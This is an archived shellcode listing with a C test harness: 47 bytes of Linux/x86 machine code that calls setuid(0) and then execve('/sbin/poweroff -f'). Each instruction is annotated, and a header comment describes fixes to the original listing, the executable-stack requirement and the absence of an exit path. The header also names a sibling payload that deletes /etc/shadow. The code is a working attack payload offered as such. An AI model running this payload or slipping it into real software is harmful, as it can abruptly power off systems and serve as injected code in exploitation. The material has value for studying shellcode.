
# Title : Linux - setuid(0) & execve("/sbin/poweroff -f")
# Published : 2009-12-04
# Author : ka0x
# Previous Title : Linux - setreuid (0,0) & execve(/bin/rm /etc/shadow)
# Next Title : win xp sp2 PEB ISbeingdebugged shellcode


#include <stdio.h>

/* 
	linux/x86 ; setuid(0) & execve("/sbin/poweroff -f") 47 bytes
	written by ka0x - <ka0x01[alt+64]gmail.com>
	lun sep 21 16:40:16 CEST 2009

	greets: an0de, Piker, xarnuz, NullWave07, Pepelux, JosS, sch3m4, Trancek, Hendrix and others!
*/

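/*
 * Test harness: print the payload length, then jump into the payload.
 *
 * The payload (linux/x86, 47 bytes) performs two system calls:
 *   setuid(0)                       -- eax = 0x17; its return value is never checked
 *   execve("/sbin/poweroff", argv, NULL) with argv = {"/sbin/poweroff", "-f", NULL}
 *                                   -- eax = 0x0b
 *
 * WARNING: when it works (i.e. run as root), this powers the machine off
 * immediately. Only run it inside a disposable VM.
 *
 * Corrections and caveats relative to the published listing:
 *   - The listing had lost its backslashes ("x31xdb" instead of "\x31\xdb"),
 *     so the "shellcode" was really the ASCII text of the hex digits and the
 *     printed length was wrong; the escapes are restored here, and the
 *     size is printed with %zu (sizeof yields size_t, not int).
 *   - The payload runs from a stack buffer. With a non-executable stack
 *     (the default on modern toolchains/kernels) the indirect call faults;
 *     an executable stack (e.g. link with -z execstack) or an mprotect()'d
 *     buffer is needed.
 *   - Converting a data pointer to a function pointer is not defined by
 *     ISO C; it is the conventional shellcode test idiom and is kept as is.
 *   - execve() only returns on failure, and there is no exit syscall after
 *     the final int 80h: on failure execution runs off the end of the
 *     buffer into whatever follows it on the stack (the terminating NUL and
 *     then unrelated stack contents). The same applies if setuid(0) fails
 *     as non-root: the payload still tries to exec poweroff.
 */
int main(void)
{
	char shellcode[] =
		"\x31\xdb"			/* xor ebx,ebx        ; ebx = 0: uid arg for setuid, base for the lea below */
		"\x6a\x17"			/* push byte 0x17     ; SYS_setuid (23) */
		"\x58"				/* pop eax */
		"\xcd\x80"			/* int 80h            ; setuid(0); result in eax is ignored */
		"\x8d\x43\x0b"			/* lea eax,[ebx+0xb]  ; SYS_execve (11), ebx is still 0 */
		"\x99"				/* cdq                ; edx = 0 (eax is positive) -> envp = NULL, NUL filler */
		"\x52"				/* push edx           ; NUL terminator for the path string */
		"\x66\x68\x66\x66"		/* push word 0x6666   ; "ff" */
		"\x68\x77\x65\x72\x6f"		/* push dword 0x6f726577 ; "wero" */
		"\x68\x6e\x2f\x70\x6f"		/* push dword 0x6f702f6e ; "n/po" */
		"\x68\x2f\x73\x62\x69"		/* push dword 0x6962732f ; "/sbi" -> "/sbin/poweroff\0" on the stack */
		"\x89\xe3"			/* mov ebx,esp        ; ebx = filename */
		"\x52"				/* push edx           ; NUL terminator for "-f" */
		"\x66\x68\x2d\x66"		/* push word 0x662d   ; "-f" */
		"\x89\xe1"			/* mov ecx,esp        ; ecx = pointer to "-f" */
		"\x52"				/* push edx           ; argv[2] = NULL */
		"\x51"				/* push ecx           ; argv[1] = "-f" */
		"\x53"				/* push ebx           ; argv[0] = "/sbin/poweroff" */
		"\x89\xe1"			/* mov ecx,esp        ; ecx = argv */
		"\xcd\x80";			/* int 80h            ; execve(ebx, ecx, edx=NULL); no exit path on failure */

	/* -1 drops the string's trailing NUL, which is not part of the payload. */
	printf("[*] ShellCode size (bytes): %zu\n\n", sizeof shellcode - 1);

	/* Jump into the buffer; requires an executable stack (see header comment). */
	(*(void (*)(void)) shellcode)();

	/* Reached only if the payload returned, i.e. execve failed and control
	 * happened to come back here. */
	return 0;
}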